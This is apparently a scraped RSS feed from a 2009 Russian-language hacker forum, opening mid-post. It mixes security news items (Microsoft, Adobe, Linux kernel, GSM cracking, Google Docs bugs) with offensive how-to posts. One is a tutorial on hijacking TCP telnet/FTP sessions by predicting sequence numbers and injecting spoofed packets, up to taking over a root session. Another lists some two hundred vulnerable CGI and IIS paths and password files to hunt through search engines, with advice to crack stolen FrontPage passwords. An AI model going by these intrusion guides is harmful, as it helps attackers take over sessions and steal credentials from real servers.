ничего хорошего. Удаленная машина упорно талдычит &quot;введи пароль&quot;. Ну а где нам взять пароль, если мы впервые на этом сервере? Серьезная проблема, не так-ли? Ладно, давайте ее и решать.<br />Есть предложение воспользоваться вот какой возможностью. А почему бы не переждать, пока настоящий пользователь не зарегистрируется в системе и потом не перехватить его сессию. Заманчиво, правда?<br />Теория.<br />Протокол TCP (Transmission Control Protocol) является одним из базовых протоколов транспортного уровня сети Internet. Работа с этим протоколом подразумевает создание непосредственного виртуального соединения, контроль ошибок, повторную пересылку поврежденных пакетов, четкую последовательность пересылки самих пакетов и разрыв соединения в конце сеанса. Нам интересен этот протокол именно потому, что такие известные протоколы прикладного уровня как FTP и TELNET реализованы на его базе. Для опознавания TCP-пакета в его заголовке существеет два 32-разрядных идентификатора, они же в свою очередь служат и счетчиками пакетов. Я имею в виду Sequence Number и Acknowledgment Number. Еще одно немаловажное поле - Control Bits.<br />Это поле размером 6 бит может содержать следующие командные биты (слева направо):<br />URG: Urgent Pointer field significant<br />ACK: Acknowledgment field significant<br />PSH: Push Function<br />RST: Reset the connection<br />SYN: Synchronize sequence numbers<br />FIN: No more data from sender</p> <p>Ну что ж, в основную теорию, надеюсь, въехали, пойдем далее. Рассмотрим как происходит процесс соединения по протоколу TCP.</p> <p>Как происходит ЭТО.<br />Допустим компьютеру &quot;Клиент&quot; (в интернете каждый компьютер умные люди зовут хостом, а чем мы хуже этих людей?) необходимо создать соединение с хостом &quot;Сервер&quot;. Это соединение происходит в 3 этапа:<br />Первым делом клиент как бы здоровается и посылает пакет серверу с установленным битом SYN (synchronize sequence number), а в поле Sequence Number установлено начальное 32-битное значение (обозначим его как ISSкл) (Initial Sequence Number).<br />Сервер тоже здоровается с клиентом (он тоже культурный) и посылает свой пакет, в котором отмечены бит SYN и бит ACK. В поле Sequence Number сервер устанавливает свое начальное значение - ISSсерв. Но это еще не все. Тут сервер начинает хитрить и в поле Acknowledgment Number ставит значение ISSкл, полученное в первом пакете от хоста &quot;Клиент&quot; да еще и увеличенное на единицу.<br />Но клиент тоже не лыком шит и тоже отвечает хитростью: он посылает свой пакет, где установлен бит ACK; поле Sequence Number содержит ISSкл + 1, а поле Acknowledgment Number содержит значение ISSсер + 1.<br />Тут процесс братания хостов и заканчивается. Виртуальное соединение считается установленным.<br />Повторим схемотично, что же происходило:<br />Клиент - &gt; Сервер: SYN, ISSкл<br />Сервер - &gt; Клиент: SYN, ACK, ISSсер, ACK(ISSкл+1)<br />Клиент - &gt; Сервер: ACK, ISSкл+1, ACK(ISSсер+1)</p> <p>Вот теперь, отрекомендовавшись у Сервера, Клиент может преспокойно отсылать свои пакеты данных, не забывая при этом менять поля ACK, ISSкл+1, ACK(ISSсер+1) и DATA.</p> <p>Разбор полета.<br />Из предыдущего раздела мы видим, что на этапе установки соединения (когда хосты здороваются) опознавание пакетов осуществляется только по Sequence Number и Acknowledgment Number. Тут сразу становится ясно, что для формирования ложного TCP-пакета нам достаточно знать текущие значения идентификаторов для данного соединения - ISSкл и ISSсер. Усугубляет картину еще и то, что FTP и TELNET вовсе не проверяют подлинность пакетов, полагая, что это сделает за них транспортный уровень. Отсюда вывод: внедрившись в процесс передачи данных на транспортном уровне можно послать пакет с любого хоста в сети Internet не зависимо от потокола (TELNET или FTP) от имени одного из участников данного соединения (например, от имени клиента), и данный пакет будет воспринят как верный! К тому же, постольку поскольку FTP и TELNET не проверяют IP адрес отправителя, то ответ на ложный пакет придет по указанному в нем адресу. Бедный же хозяин пакетов (Клиент) попросту отвалится из-за рассогласования счетчиков (сервер нас уже посчитал).</p> <p>Дядь, дай десять копеек.<br />Ну что ж осталось дело за малым. Надо рассчитать ISSкл и ISSсер, а также предсказать динамику их изменения. Это самая сложная задача, но мы трудностей не боимся. (Он сказал &quot;Поехали!&quot; и взмахнул рукой).</p> <p>Случай 1 (простой).<br />Предположим, что мы находимся в том же сегменте сети, что и атакуемый хост. Дело за малым. Ставим сниффер, направляем весь трафик через свой хост и смотрим за клиентами, подключающимися к серверу. Конечно же нас интересуют только пакеты со значениями ISSкл и ISSсер (можно даже не интересоваться содержанием поля DATA, т.е. анализировать только заголовки). Итак. Собираем информацию, ищем зависимость, составляем формулу и в путь.</p> <p>Случай второй (сложный).<br />Предположим, мы находимся в другом сегменте сети и проанализировать трафик нам не удастся.<br />Для начала нам надо определить ISN - Initial Sequence Number, т.е. как ОС формирует начальное значение. По документации протокола TCP (RFC 793) рекомендуется увеличивать значение этого 32-битного счетчика на 1 каждые 4 микросекунды, но на практике это далеко не так. Например, в Linux 1.2.8 это значение вычисляется по такому закону:</p> <p>ISN=mcsec + 1000000 sec, где mcsec - время в микросекундах;<br />sec - текущее время в секундах, причем отсчет его идет от 1970 года.</p> <p>в Windows NT 4.0:</p> <p>ISN=10 msec, где msec - текущее время в миллисекундах.</p> <p>ОК, На этом и сговоримся. Закон вычисления ISN зависит от времени и представляет функцию</p> <p>ISN=F(mсsec)</p> <p>Вид же самой функции F можно получить проанализировав исходный код ядра. Тут Вы сразу закричите: &quot;Да ты гонишь, где же достать исходники Windows?!&quot; Да, трудновато. Придется импровизировать.<br />Представим ОС &quot;черным яциком&quot; и проведем серию тестов запрос-ответ, причем фиксируя время между запросом и ответом на него, а также время между запросами. (Проще говоря, прикинемся обезьяной с часами, и будем просить соединения у сервера, записывая изменения ISN во времени).<br />В результате получится такая таблица значений</p> <p>ISN(1) - T(1)</p> <p>ISN(2) - T(2)</p> <p>ISN(3) - T(3)</p> <p>...</p> <p>...</p> <p>...</p> <p>ISN(N) - T(N)</p> <p>Здесь ISN (i) - значение ISN, полученное в момент времени i, а T(i) - время от начела эксперимента (время начала возьмем за 0).<br />Проанализировав результаты наблюдений, можно составить функцию</p> <p>ISN(t)=F(t)</p> <p>С ее помощью уже можно получив ответ, предсказать значение ISN через определенный промежуток времени.<br />Сразу оговорюсь. Не обязательно нападать с подобными тестами на интересующий нас хост. Можно просто найти такой жи тип ОС, что и там и протестировать ее, а результат (полученную функцию) записать и применить уже в деле.<br />Вот, собственно, и все. Осталось дождаться, когда пользователь зарегистрируется в системе, введет логинпароль и начнет работу. Какие наши действия? Прогнозируем нимер ISN, создаем пакет с заполненными полями ACK, ISSкл+1, ACK(ISSсер+1) и DATA и, если повезет захватываем сессию. Если не повезло, немного меняем ISSкл вместе с ACK(ISSсер+1) и за старое. Рано или поздно значения будут верными. Тут нам откроются такие возможности! Этими средствами можно даже захватить сеанс полозователя root. Представить страшно.<br />Вот таким далеко не простым способом можно проникнуть в любую систему. Желаю удачи!</p> mybb@mybb.ru (kravi4) Fri, 20 Nov 2009 14:34:31 +0300 http://sapog.forumbb.ru/viewtopic.php?pid=45#p45 http://sapog.forumbb.ru/viewtopic.php?pid=44#p44 <p>10 февраля корпорация Microsoft выпустила очередную порцию обновлений для своих программных продуктов.</p> <p>На этот раз опубликованы четыре бюллетеня безопасности, содержащие описание восьми &quot;дыр&quot;. Две уязвимости, обнаруженные в браузере Internet Explorer седьмой версии, охарактеризованы как критически опасные, а следовательно, могут использоваться злоумышленниками с целью выполнения произвольного программного кода на удаленном компьютере. Для организации атаки необходимо заманить жертву на сформированную специальным образом веб-страницу. Еще две критически опасные &quot;дыры&quot; устранены в почтовом сервере Microsoft Exchange. </p> <p>Оставшиеся четыре уязвимости, получившие статус &quot;важных&quot;, тоже могут использоваться киберпреступниками с целью захвата контроля над удаленным ПК. Одна из этих &quot;дыр&quot; присутствует в системе управления базами данных SQL Server, три других - в пакете Visio, входящем в состав набора офисных приложений Microsoft Office. </p> <p>Кроме того, корпорация Microsoft выпустила обновленную версию утилиты Malicious Software Removal Tool, содержащую процедуры для удаления вредоносного кода, при помощи которого злоумышленники могут подключать машины жертв к ботнету Srizbi.</p> mybb@mybb.ru (kravi4) Fri, 20 Nov 2009 14:32:10 +0300 http://sapog.forumbb.ru/viewtopic.php?pid=44#p44 http://sapog.forumbb.ru/viewtopic.php?pid=43#p43 <p>Adobe Systems предупредила пользователей программного обеспечения Adobe Reader 9 и Acrobat 9 о наличии критической уязвимости, эксплуатация которой позволяет вызвать переполнение буфера после чего атакующий злоумышленник может похитить пользовательские данные. В Adobe также отметили, что у злоумышленников уже есть эксплоиты, а образцы программ, использующих уязвимости, уже циркулируют в интернете. &quot;Предыдущие версии программного обеспечения Adobe, связанного с PDF-файлами, также подвержены уязвимости и потенциально могут привести к получению контроля над компьютером пользователя&quot;, - сообщили в Adobe. В связи с тем, что Adobe, как и многие другие производители программного обеспечения, выпускает патчи кумулятивными наборами в ежемесячном режиме, ожидать закрытия указанных уязвимостей можно будет лишь к 11 марта. После того, как будут закрыты уязвимости в 9-й версии, компания выпустит исправления для 7-й и 8-й версий. До тех пор производитель советует постоянно обновлять антивирусное программное обеспечение и не загружать PDF-файлы из неизвестных источников. Антивирусная компания McAfee дополняет, что сейчас об уязвимости известно немного, но уже это было достаточно, чтобы получить работающий эксплоит, как только авторы раскроют чуть больше сведений о проблеме, можно будет ожидать появления новых версий уязвимости. До 11 марта у злоумышленников времени предостаточно. Точная природа уязвимости неизвестна, но есть сведения, что во время обработки программного кода в PDF-файлах при определенном сочетании инструкций происходит переполнение памяти, отведенной под программу. После переполнения атакующий может заразить компьютер пользователя злонамеренными образцами программ и удаленно контролировать машину.</p> mybb@mybb.ru (kravi4) Fri, 20 Nov 2009 14:31:39 +0300 http://sapog.forumbb.ru/viewtopic.php?pid=43#p43 http://sapog.forumbb.ru/viewtopic.php?pid=42#p42 <p>Как сообщается в официальном блоге Google Docs, из-за ошибки случайные пользователи получили доступ к ряду документов Google Docs. По словам представителей компании, &quot;баг&quot; был полностью исправлен на минувших выходных и затронул лишь 0,05% от общего числа документов.</p> <p>Права на работу с чужими документами ошибочно раздавались лишь при комбинации определённых условий. Речь идёт о документах, на которые владелец уже раздавал права ранее, при этом &quot;баг&quot; проявлялся лишь тогда, когда владелец или же один из соавторов, имеющих права на раздачу доступа, отмечал в общем списке сразу несколько документов и презентаций и изменял права доступа к ним. Причем документы-таблицы эта ошибка не затронула.</p> <p>Как заявила Дженнифер Мэззон, продакт-менеджер Google Docs, после исправления ошибки компания автоматически восстановила права доступа и сообщила владельцам пострадавших документов об инциденте отдельным письмом.</p> <p>&quot;Мы сожалеем о случившейся проблеме. Мы понимаем беспокойство наших пользователей (на самом деле жертвами ошибки стали и мы), и мы относимся к таким вопросам очень серьезно&quot;, - говорится в заявлении компании.</p> mybb@mybb.ru (kravi4) Fri, 20 Nov 2009 14:31:00 +0300 http://sapog.forumbb.ru/viewtopic.php?pid=42#p42 http://sapog.forumbb.ru/viewtopic.php?pid=41#p41 <p>Что мы ищем? Одна из уязвимостей веб-сайтов это открытые директории. Многие администраторы часто забывают помнять настройrи выставленные сервером по умолчанию. Такие ошибки в обычно приводят к дефейсу веб-страницы. <br />Что дают нам открытые директории? <br />Например, через дериктории cgi-bin или scripts можно исполнить любой скрипт на удаленной машине. Через директорию _vti_bin (сайт под управление FrontPage), через утилиту shtml.exe можно просмотреть любой файл на диске. А, например, в директории vti_pvt содержатся все пароли доступа к FrontPage Extension (файл service.pwd). Рассшифровать полученные пароли я думаю труда не составит. Весь необходимый для дешифровки софт Вы можете найти на wwwhsy-net.tk в разделе Crack. <br />Где искать? <br />Это самый простой вопрос. Набираем wwwgoogle.com или любой другой поисковик вводим нужную фразу и вперед, остаеться только пересмотреть результаты пойска :). Иногда это не простая задача. Например на запрос /ets/passwd yahoo выдал 102000 результатов. Но думаю для настоящего хакера это не проблема. <br />Список <br />А вот наконец и сам список: </p> <p>/cgi-bin/axs.cgi <br />/cgi-bin/bash <br />/cgi-bin/bb-hist.sh <br />/cgi-bin/bigconf.cgi <br />/cgi-bin/bnbform <br />/cgi-bin/bnbform.cgi <br />/cgi-bin/cachemgr.cgi <br />/cgi-bin/calendar <br />/cgi-bin/campas <br />/cgi-bin/carbo.dll <br />/cgi-bin/cgimail.exe <br />/cgi-bin/Cgitest.exe <br />/cgi-bin/cgiwrap <br />/cgi-bin/classified.cgi <br />/cgi-bin/classifieds <br />/cgi-bin/classifieds.cgi <br />/cgi-bin/Count.cgi <br />/cgi-bin/csh <br />/cgi-bin/date <br />/cgi-bin/day5datacopier.cgi <br />/cgi-bin/day5notifier <br />/cgi-bin/dbmlparser.exe <br />/cgi-bin/download.cgi <br />/cgi-bin/dumpenv.pl <br />/cgi-bin/edit.pl <br />/cgi-bin/environ.cgi <br />/cgi-bin/excite <br />/cgi-bin/faxsurvey <br />/cgi-bin/faxsurvey <br />/cgi-bin/filemail <br />/cgi-bin/filemail.pl <br />/cgi-bin/files.pl <br />/cgi-bin/finger <br />/cgi-bin/finger.cgi <br />/cgi-bin/finger.pl <br />/cgi-bin/flexform <br />/cgi-bin/flexform.cgi <br />/cgi-bin/FormHandler.cgi <br />/cgi-bin/formmail.pl <br />/cgi-bin/fortune <br />/cgi-bin/fpexplorer.exe <br />/cgi-bin/get32.exe|dir <br />/cgi-bin/glimpse <br />/cgi-bin/guestbook.cgi <br />/cgi-bin/guestbook.pl <br />/cgi-bin/GW5 <br />/cgi-bin/GWWEB.EXE <br />/cgi-bin/handler <br />/cgi-bin/handler.cgi <br />/cgi-bin/htmlscript <br />/cgi-bin/htmlscript <br />/cgi-bin/info2www <br />/cgi-bin/input.bat <br />/cgi-bin/input2.bat <br />/cgi-bin/jj <br />/cgi-bin/ksh <br />/cgi-bin/lwgate <br />/cgi-bin/LWGate.cgi <br />/cgi-bin/lwgate.cgi <br />/cgi-bin/MachineInfo <br />/cgi-bin/mail <br />/cgi-bin/maillist.pl <br />/cgi-bin/man.sh <br />/cgi-bin/mlog.phtml <br />/cgi-bin/mylog.phtml <br />/cgi-bin/nlog-smb.pl <br />/cgi-bin/nph-error.pl <br />/cgi-bin/nph-publish <br />/cgi-bin/nph-test-cgi <br />/cgi-bin/passwd <br />/cgi-bin/passwd.txt <br />/cgi-bin/password <br />/cgi-bin/password.txt <br />/cgi-bin/perl <br />/cgi-bin/perl.exe <br />/cgi-bin/perlshop.cgi <br />/cgi-bin/pfdispaly.cgi <br />/cgi-bin/phf <br />/cgi-bin/phf.pp <br />/cgi-bin/php <br />/cgi-bin/php.cgi <br />/cgi-bin/phpscan <br />/cgi-bin/post-query <br />/cgi-bin/ppdscgi.exe <br />/cgi-bin/query <br />/cgi-bin/redirect <br />/cgi-bin/responder.cgi <br />/cgi-bin/rguest.exe <br />/cgi-bin/rksh <br />/cgi-bin/rsh <br />/cgi-bin/rwwwshell.pl <br />/cgi-bin/sam._ <br />/cgi-bin/search.cgi <br />/cgi-bin/search97.vts <br />/cgi-bin/sendform.cgi <br />/cgi-bin/sh <br />/cgi-bin/snorkerz.bat <br />/cgi-bin/snorkerz.cmd <br />/cgi-bin/status.cgi <br />/cgi-bin/survey <br />/cgi-bin/survey.cgi <br />/cgi-bin/tcsh <br />/cgi-bin/test.bat <br />/cgi-bin/test-cgi <br />/cgi-bin/test-cgi.tcl <br />/cgi-bin/test-env <br />/cgi-bin/textcounter.pl <br />/cgi-bin/tst.bat <br />/cgi-bin/tst.bat|dir <br />/cgi-bin/unlg1.1 <br />/cgi-bin/upload.pl <br />/cgi-bin/uptime <br />/cgi-bin/view-source <br />/cgi-bin/visadmin.exe <br />/cgi-bin/visitor.exe <br />/cgi-bin/w3-msql <br />/cgi-bin/w3-sql <br />/cgi-bin/w3tvars.pm <br />/cgi-bin/wais.pl <br />/cgi-bin/webdist.cgi <br />/cgi-bin/webgais <br />/cgi-bin/webmap.cgi <br />/cgi-bin/websendmail <br />/cgi-bin/wguest.exe <br />/cgi-bin/whois_raw.cgi <br />/cgi-bin/wrap <br />/cgi-bin/wwwadmin.pl <br />/cgi-bin/wwwboard.pl <br />/cgi-bin/www-sql <br />/cgi-bin/zsh <br />/cgi-dos/args.bat <br />/cgi-dos/args.cmd <br />/cgi-shl/win-c-sample.exe <br />/cgi-win/uploader.exe <br />/cool-logs/mlog.html <br />/cool-logs/mylog.html <br />/database.nsf <br />/database.nsf <br />/domcfg.nsf <br />/domlog.nsf <br />/hosts.dat <br />/iisadmpwd/achg.htr <br />/IISADMPWD/achg.htr <br />/iisadmpwd/aexp.htr <br />/iisadmpwd/aexp2.htr <br />/iisadmpwd/aexp2b.htr <br />/iisadmpwd/aexp3.htr <br />/iisadmpwd/aexp4.htr <br />/iisadmpwd/aexp4b.htr <br />/iisadmpwd/anot.htr <br />/iisadmpwd/anot3.htr <br />/iissamples/exair/howitworks/codebrws.asp <br />/iissamples/sdk/asp/docs/codebrws.asp <br />/log.nsf <br />/manage/cgi/cgiproc <br />/msadc/msadcs.dll <br />/msadc/samples/adctest.asp <br />/msadc/Samples/SELECTOR/codebrws.cfm <br />/msadc/Samples/SELECTOR/showcode.asp <br />/msads/samples/selector/showcode.asp <br />/names.nsf <br />/names.nsf <br />/passwd <br />/passwd.txt <br />/password <br />/password.txt <br />/publisher/ <br />/samples/search/queryhit.htm <br />/scripts/CGImail.exe <br />/scripts/convert.bas <br />/scripts/counter.exe <br />/scripts/cpshost.dll <br />/scripts/fpcount.exe <br />/scripts/iisadmin/bdir.htr <br />/scripts/iisadmin/ism.dll <br />/scripts/iisadmin/tools/ctss.idc <br />/scripts/iisadmin/tools/getdrvrs.exe <br />/scripts/iisadmin/tools/mkilog.exe <br />/scripts/issadmin/bdir.htr <br />/scripts/perl <br />/scripts/postinfo.asp <br />/scripts/proxy/w3proxy.dll <br />/scripts/samples/ctguestb.idc <br />/scripts/samples/details.idc <br />/scripts/samples/search/webhits.exe <br />/scripts/tools/dsnform.exe <br />/scripts/tools/getdrvrs.exe <br />/scripts/tools/getdrvs.exe <br />/scripts/tools/newdsn.exe <br />/scripts/upload.asp <br />/scripts/uploadn.asp <br />/scripts/uploadx.asp <br />/search <br />/search97.vts <br />/secure/.htaccess <br />/secure/.wwwacl <br />/session/adminlogin <br />/showfile.asp <br />/smdata.dat <br />/ssi/envout.bat <br />/today.nsf <br />/tree.dat <br />/WebSTAR <br />/ws_ftp.ini <br />/wwwboard/passwd.txt </p> <p>Удачной рыбалки :))</p> mybb@mybb.ru (kravi4) Fri, 20 Nov 2009 14:30:14 +0300 http://sapog.forumbb.ru/viewtopic.php?pid=41#p41 http://sapog.forumbb.ru/viewtopic.php?pid=40#p40 <p>В Microsoft DirectX найдена опасная «брешь»</p> <p>Корпорация Microsoft предупреждает о наличии опасной «дыры» в одном из компонентов программного интерфейса DirectX.</p> <p>Как сообщается в официальном уведомлении, проблема связана с модулем DirectShow, используемым для ввода/вывода аудио- и/или видеоданных.</p> <p>Вынудив жертву открыть сформированный специальным образом медиафайл в формате QuickTime, злоумышленник может получить несанкционированный доступ к удаленному компьютеру с привилегиями текущего пользователя.</p> <p>Таким образом, если владелец ПК вошел в систему в качестве администратора, нападающий сможет выполнить на машине произвольный программный код.</p> <p>Уязвимость обнаружена в операционных системах Windows 2000 с четвертым сервис-паком, Windows XP и Windows Server 2003. Платформы Windows Vista и Windows Server 2008, по предварительным данным, «дыры» не содержат.</p> <p>«Майкрософт» отмечает, что уже зарегистрированы случаи практической эксплуатации уязвимости — впрочем, они носят пока ограниченный характер.</p> <p>Компания занимается решением проблемы. Не исключено, что «заплатка» для уязвимости войдет в следующую порцию патчей, которая будет выпущена 9 июня.</p> <p>Подготовлено по материалам Microsoft.</p> mybb@mybb.ru (kravi4) Fri, 20 Nov 2009 14:28:56 +0300 http://sapog.forumbb.ru/viewtopic.php?pid=40#p40 http://sapog.forumbb.ru/viewtopic.php?pid=39#p39 <p>«Лаборатория Касперского» представляет аналитическую статью «Лето – время беспроводной связи». Статья посвящена вопросам безопасности Wi-Fi – популярного стандарта беспроводного доступа в локальные сети и Интернет.</p> <p>Автор статьи – вирусный аналитик «Лаборатории Касперского» в Центральной Европе Кристиан Функ. В статье рассматриваются угрозы, связанные с Wi-Fi, их возможные последствия, меры защиты, а также альтернативный вариант беспроводной связи – сотовый стандарт нового поколения UMTS.</p> <p>Как отмечает автор, именно сейчас, в летний сезон, все большее количество пользователей уезжают в отпуска и начинают чаще использовать публичные точки Wi-Fi для выхода в Интернет. Это имеет ряд преимуществ, например, независимость от сотового провайдера, но также несет и угрозу нарушения целостности и конфиденциальности передаваемой информации.</p> <p>По мнению автора статьи, Wi-Fi-сети уязвимы к атакам типа «человек посередине» (man-in-the-middle), при которых злоумышленник перехватывает канал связи, получая полный доступ к передаваемой информации. Целью таких атак могут быть пароли, логины, данные кредитных карт и другая конфиденциальная информация.</p> <p>Кристиан Функ считает, что эффективным способом шифрования и туннелирования данных Wi-Fi является применение технологии виртуальных частных сетей (Virtual Private Network, VPN). Туристам, не имеющим домашнего или корпоративного VPN-сервера, возможно, следует воспользоваться услугами широко доступных сегодня VPN-сервисов.</p> <p>Автор статьи рассматривает и альтернативную Wi-Fi технологию доступа в Интернет – сотовую связь 3-го поколения UMTS, поддерживающую оптимизированные алгоритмы аутентификации. Зона ее покрытия в европейских городах в настоящее время может достигать 90% территории, а цены – вполне конкурентоспособны.</p> mybb@mybb.ru (kravi4) Fri, 20 Nov 2009 14:28:03 +0300 http://sapog.forumbb.ru/viewtopic.php?pid=39#p39 http://sapog.forumbb.ru/viewtopic.php?pid=38#p38 <p>Технические специалисты израильской компании Radware обнаружили новый метод заражения компьютеров злонамеренным софтом. Внедрение хакерского кода происходит в момент, когда компьютер-жертва производит обновление программного обеспечения. Израильские программисты говорят, что в процесс обновления можно без особых проблем вмешаться и фактически подменить обновляемое приложение. Итцик Котлер, один из разработчиков новой методики, говорит, что такому методу внедрения подвержены не менее сотни популярных приложений, используемых миллионам пользователей по всему миру. Radware разработала специальное программное обеспечение Ippon, которое позволяет проводить атаку и предлагает трехмерную демонстрацию всех проводимых действий. Показ новинки состоялся в рамках конференции Black Hat 2009, ежегодно проводимой в Лас-Вегасе, США. На сей раз на конференции собрались более 4000 ИТ-специалистов со всего мира. Принцип действия программы довольно прост: она сканирует пространство в поисках работающей WiFi-сети и проверяет передаваемый траффик на наличие специальных флагов обновления программ, сканирование осуществляется на уровне стандартного протокола HTTP. В том случае, если программа &quot;унюхает&quot; в трафике запросы на обновление софта, то она перехватывает их и отвечает перед легитимным сервером обновлений, передавая свой поток данных. &quot;Ippon также способен подделывать сообщения, говоря популярным программам, что для них доступны обновления и предлагать их вместо данных с подлинных серверов. Злонамеренный код загружается на компьютер-жертву под видом легитимного софта и выполняется с привилегиями пользователя, загрузившего код&quot;, - говорят в Radware. Решением в данном случае может стать использование цифровых подписей в процессе обновления. К примеру, все разработки Microsoft при обновлении такие подписи используют, однако есть масса программ, отказавшихся цифровых подписей. Кроме того, разработчики советуют пользователям загружать обновления только из защищенных сетей и быть особенно осторожными при работе в публичных беспроводных сетях.</p> mybb@mybb.ru (kravi4) Fri, 20 Nov 2009 14:27:18 +0300 http://sapog.forumbb.ru/viewtopic.php?pid=38#p38 http://sapog.forumbb.ru/viewtopic.php?pid=37#p37 <p>На недавней конференции Hacking at Random (HAR).<br />Karsten Nohl подробно разобрал план для крекинга стандартной ячейки GSM шифрования - А5/1, а так же, то <br />что бы результаты были доступны для общего использования.</p> <p>Последствия для бизнеса, частных лиц и мобильной индустрии огромны: <br />- Это значит, что каждый имеющий 500$, радио карту и ноутбук смогут прослушивать GSM звонки<br />- Преступники смогут перехватывать и отключать звонки.<br />Стэн Шатт, вице-президента и директора, здравоохранению и безопасности в ABI Research, прокомментировал:<br />&quot;Потенциально эта новость может иметь глубокое влияние на индустрию сотовых телефонов, как вскрытие шифрования WEP повлиял на индустрии беспроводных локальных сетей.&quot;<br />Конечно, большинство людей понимали, что правительство было в состоянии перехватывать их телефонные соединения, но они считали себя более или менее защищенными от преступников<br />и корпоративного шпионажа. Теперь нужно опасаться людей, изучающих ценную информацию об их счетах в банке, личных делах т.д. </p> <p>Саймон Брэнсфилд-Гарт, президент Силлкрипт прокомментировал: &quot;Все знали в течение достаточно долгого времени, что существовал теоретический возможность взлома. GSM. Эти новости означают, <br />что теоретический риск станет очень реальным в течение следующих шести месяцев. </p> <p>И теперь это - очень беспокойная перспектива<br />любого, который обсуждает ценную или конфиденциальную информацию по их мобильному телефону.&quot;</p> mybb@mybb.ru (kravi4) Fri, 20 Nov 2009 14:26:17 +0300 http://sapog.forumbb.ru/viewtopic.php?pid=37#p37 http://sapog.forumbb.ru/viewtopic.php?pid=36#p36 <p>Многие пользователи онлайн-системы Google Docs сообщают о проблемах с печатью, экспортом и загрузкой определенных файлов. В Google признают, что проблема образовалась после проведения серии последних обновлений в онлайновом офисном наборе. В данный момент на дискуссионных форумах появляются все новые и новые сообщения от пользователей, которые оказались не в состоянии воспользоваться собственными данными.</p> <p>В Google официально признали наличие проблемы несколько часов назад, однако пока не дают никаких прогнозов, относительно того, когда она будет исправлена.</p> <p>По предположению сторонних экспертов, сбой был вызван наличие функции файлообмена в Google Docs.</p> <p>Накануне компания реализовала важную для корпоративных пользователей технологию в системе онлайнового офисного набора Google Docs. Пользователи платной версии системы Google Apps Premier Edition смогли обмениваться друг с другом служебными файлами и предоставлять доступ к своим файлам коллегам по работе. </p> <p>Выставление привилегий файлам и папкам происходит по аналогии с системой управления привилегиями в Windows - выбирается папка и указывается кому и какие привилегии на нее предоставить. &quot;Создавать и обмениваться данными в рамках Google Apps теперь очень просто, работники имеют шанс существенно повысить производительность труда без существенных затрат&quot;, - говорили в Google.</p> <p>По словам представителей интернет-гиганта, функция файлообмена была названа пользователями Google Apps во время голосования одной из наиболее востребованных. В ближайшее время в компании также готовятся обновить файловый загрузчик таким образом, чтобы он мог загружать несколько файлов или папок с файлами одновременно.</p> mybb@mybb.ru (kravi4) Fri, 20 Nov 2009 14:25:32 +0300 http://sapog.forumbb.ru/viewtopic.php?pid=36#p36 http://sapog.forumbb.ru/viewtopic.php?pid=35#p35 <p>Группа исследователей систем информационной безопасности из центра Cryptography Research сообщила об обнаружении ранее неизвестного метода похищения криптографических ключей, используемых для защиты современных мобильных беспроводных систем связи. Новый метод позволяет также подделывать сессию аутентификации, что позволяет злоумышленнику выдать себя за того или иного легитимного пользователя.</p> <p>В основе метода лежит технология дифференциального анализа мощности или, проще говоря, технология, измеряющая объемы электричества и радиочастоту, излучаемую беспроводным устройством. Еще проще: хакерское устройство просто подделывает ранее полученное электромагнитное колебание, используемое легитимным устройством для передачи на сервер аутентификации.</p> <p>Бенджамин Джан, глава Cryptography Research и один из разработчиков технологии, говорит, что защититься от этой технологии можно двумя способами: использовать узконаправленные антенны или применять специальное оборудование. В масштабах компаний имеет смысл использовать оба метода, дабы свести вероятность кражи данных к минимуму.</p> <p>Для захвата и анализа сигнала может быть использован обыкновенный осциллограф. В его задачу входит захват уровней излучения электрического сигнала и/или радиочастот. Когда данные с оциллографа оказываются в руках злоумышленника, то ему остается лишь понять, когда и откуда поступал запрос на передачу или прием пароля, либо когда начиналась сессия по передаче данных. С наличием некоторого опыта работы с технологиями радиоперехвата, сделать это совсем несложно.</p> <p>&quot;Пока чип выполняет криптографические расчеты, он создает ключ несколькими способами. В данные моменты уровни излучения процессора колеблются и это можно зафиксировать. Например, кто-то с надлежащим оборудованием может похитить криптографические ключи от близлежащей беспроводной сети. Кроме того, таким же способом хакер может проникать в почтовые ящики жертв или проводить поддельные транзакции в системах онлайн-банкинга. Ему лишь надо точно воспроизвести радио- или электрический сигнал&quot;, - говорит Джан.</p> <p>В Cryptography Research рассказали, что особенно &quot;хорошо ломаются&quot; при помощи данного способа современные смартфоны, работающие с интернетом через беспроводные сети. Точных данных о том, какие именно смартфоны &quot;хорошо ломаются&quot; в компании не предоставили. Также в компании не сообщили, есть ли беспроводные технологии, не подверженные данной атаке.</p> <p>&quot;На практике такое нападение реализовать непросто, но вполне возможно. Наш метод - это не теория&quot;, - говорит глава Cryptography Research. По его словам, впервые об удаленном электронном или радио-снятии сигнала хакеры заговорили еще лет 10 назад, правда тогда это касалось кассовых аппаратов и банкоматов.</p> <p>В Cryptography Research говорят, что намерены производить специальное оборудование, предотвращающее данные атаки. Алгоритм действия оборудования будет основан на внесении случайных радио- и электрических шумов в сеанс передачи данных.</p> mybb@mybb.ru (kravi4) Fri, 20 Nov 2009 14:25:01 +0300 http://sapog.forumbb.ru/viewtopic.php?pid=35#p35 http://sapog.forumbb.ru/viewtopic.php?pid=34#p34 <p>Независимые разработчики программного обеспечения обнаружили в ядре операционной системы Linux серьезную уязвимость, позволяющую нелегитимным пользователям получить полный контроль над открытой операционной системой.</p> <p>Проблема кроется в ошибочном коде ядра, точнее в одном из нулевых указателей. Группа разработчиков ядра сообщила, что уязвимость может быть устранена только в предстоящем релизе ядра 2.6.32, что потенциально делает уязвимыми всех пользователей данной ОС. Однако коммерческие производители Linux, такие как Red Hat или Novell, уже выпустили обновления для ядер в своих дистрибутивах, поэтому пользователям соответствующих дистрибутивов, имеющих действующие подписки, рекомендуется как можно скорее скачать патч для ядра или обновленную версию ядра.</p> <p>Как пояснили в компании Red Hat, уже закрывшей данный баг для RHEL4 и 5, уязвимость кроется в функции mmap_min_addr, где не реализована должным образом защита. В том случае, если ИТ-администратор лично компилирует ядро из исходных кодов, то данную функцию в принципе можно временно отключить, а когда выйдет новая версия ядра, перекомпилировать его.</p> <p>Впервые о данной уязвимости было сообщено 22 октября, когда в компании GRsecurity сообщили о концептуальной уязвимости, позже стало очевидно, что уязвимость вполне практическая и может быть использована при помощи эксплоита.</p> mybb@mybb.ru (kravi4) Fri, 20 Nov 2009 14:22:13 +0300 http://sapog.forumbb.ru/viewtopic.php?pid=34#p34 http://sapog.forumbb.ru/viewtopic.php?pid=33#p33 <p>В связи с большим количеством вопросов </p> <p>- закрыли доступ на Однокласники <br />- закрыли доступ в Контакт <br />- закрыли доступ Любмое порно.ru </p> <p>Выкладываю способ для новичков как обойти сее негодование. </p> 